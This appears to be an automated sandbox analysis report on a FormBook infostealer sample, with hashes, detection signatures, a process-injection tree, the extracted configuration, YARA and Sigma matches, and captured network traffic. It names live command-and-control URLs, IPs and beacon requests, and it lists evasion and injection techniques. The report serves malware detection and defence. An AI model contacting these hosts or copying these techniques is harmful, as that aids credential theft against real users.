
Windows Analysis Report TPJX2QwEdXs5sTV.exe

Overview

General Information

Sample Name: TPJX2QwEdXs5sTV.exe
Analysis ID: 483640
MD5: ce556ce97ea23cbc2940f2aad45d468f
SHA1: cc2bdaefa2f0ac108e2f456e42a42e8258580cf4
SHA256: 7c3d5ebd2c417a52b2a0b98dee95b5a7f283816f6a2453ceeffd31becc140882
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TPJX2QwEdXs5sTV.exe (PID: 5056 cmdline: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' MD5: CE556CE97EA23CBC2940F2AAD45D468F)
    • RegSvcs.exe (PID: 5192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
    • RegSvcs.exe (PID: 4036 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmd.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 4572 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.438451.com/t75f/"], "decoy": ["ice-lemon.pro", "ar3spro.cloud", "9055837.com", "fucksociety.net", "prettyofficialx.com", "mfxw.xyz", "relationshipquiz.info", "customia.xyz", "juanayjuan.com", "zidiankj.com", "facture-booking.com", "secondmining.store", "aboutyou.club", "gongxichen.com", "laurabraincreative.com", "pierrot-bros.com", "saintpaulaccountingservices.com", "dom-maya.com", "garderobamarzen.net", "la-salamandre-assurances.com", "pearmanprep.com", "telfarcontrol.com", "productsshareco.com", "cirf2021.online", "purchasevip.com", "cakewalkvision.com", "pointrenewables.com", "groups4n.com", "swnegce.xyz", "tjapro.com", "packagedesign.biz", "services-govgr.cloud", "shopgrassfedbeef.com", "tquilaint.com", "templetreemontessori.com", "munortiete.com", "nothingbutspotlesss.com", "fanpaixiu.xyz", "fr-site-amazon.com", "salartfinance.com", "beachers-shop.com", "friskvardaportalen.online", "pinsanova.site", "lemonvinyl.online", "indianadogeavaxsite.site", "styphon.com", "open24review-service.com", "bdjh9.xyz", "cocodiesel.com", "fortmyersfl.deals", "dsdtourism.com", "phone-il.net", "learningfactoryus.com", "incentreward.xyz", "travellerfund.com", "changcheng.pro", "cryptowalletts.com", "tradopplst.xyz", "autonomoustechnologyinc.com", "assessmentdna.xyz", "denicon-th.com", "dib5so.com", "genwealthbuilders.store", "delnetitcilo.net"]}

Yara Overview

Memory Dumps

Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x6ab9:$sqlite3step: 68 34 1C 7B E1
  • 0x6bcc:$sqlite3step: 68 34 1C 7B E1
  • 0x6ae8:$sqlite3text: 68 38 2A 90 C5
  • 0x6c0d:$sqlite3text: 68 38 2A 90 C5
  • 0x6afb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6c23:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(27 entries in total; only the first are shown here)

Unpacked PEs

Source: 6.2.RegSvcs.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 6.2.RegSvcs.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 6.2.RegSvcs.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x15cb9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dcc:$sqlite3step: 68 34 1C 7B E1
  • 0x15ce8:$sqlite3text: 68 38 2A 90 C5
  • 0x15e0d:$sqlite3text: 68 38 2A 90 C5
  • 0x15cfb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e23:$sqlite3blob: 68 53 D8 7F 8C
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x68418:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x687a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x744b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x73fa1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x745b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x7472f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x691ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x7321c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x69f32:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x799a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x7aa4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(4 entries in total; only the first are shown here)

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' , ParentImage: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe, ParentProcessId: 5056, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5192
Sigma detected: Possible Applocker Bypass
Source: Process started, Author: juju4, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' , ParentImage: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe, ParentProcessId: 5056, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5192

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: TPJX2QwEdXs5sTV.exe, ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match, File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY
Source: 6.2.RegSvcs.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: TPJX2QwEdXs5sTV.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: TPJX2QwEdXs5sTV.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegSvcs.pdb, source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.390723041.000000000105F000.00000040.00000001.sdmp, cmd.exe, 00000017.00000002.518459422.000000000369F000.00000040.00000001.sdmp
Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe, 00000017.00000002.511566191.0000000000870000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmd.exe
Source: Binary string: RegSvcs.pdb source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
Source: Binary string: cmd.pdb source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 23_2_0087B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 23_2_0087B89C
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 23_2_008868BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 23_2_008868BA
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 23_2_0088245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 23_2_0088245C
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 23_2_008931DC FindFirstFileW,FindNextFileW,FindClose, 23_2_008931DC
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 23_2_008785EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 23_2_008785EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop edi, 6_2_004162C7

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.ice-lemon.pro
Source: C:\Windows\explorer.exe, Domain query: www.indianadogeavaxsite.site
Source: C:\Windows\explorer.exe, Domain query: www.munortiete.com
Source: C:\Windows\explorer.exe, Domain query: www.pierrot-bros.com
Source: C:\Windows\explorer.exe, Network Connect: 54.194.41.141 80
Source: C:\Windows\explorer.exe, Network Connect: 172.67.147.111 80
Performs DNS queries to domains with low reputation
Source: DNS query: www.fanpaixiu.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.438451.com/t75f/
Source: global traffic, HTTP traffic detected: GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1 Host: www.indianadogeavaxsite.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1 Host: www.munortiete.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: cmd.exe, 00000017.00000002.521651760.0000000003C32000.00000004.00020000.sdmpString found in binary or memory: https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLV
          Source: unknownDNS traffic detected: queries for: www.ice-lemon.pro
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.indianadogeavaxsite.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.munortiete.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.280628910.0000000001448000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: TPJX2QwEdXs5sTV.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
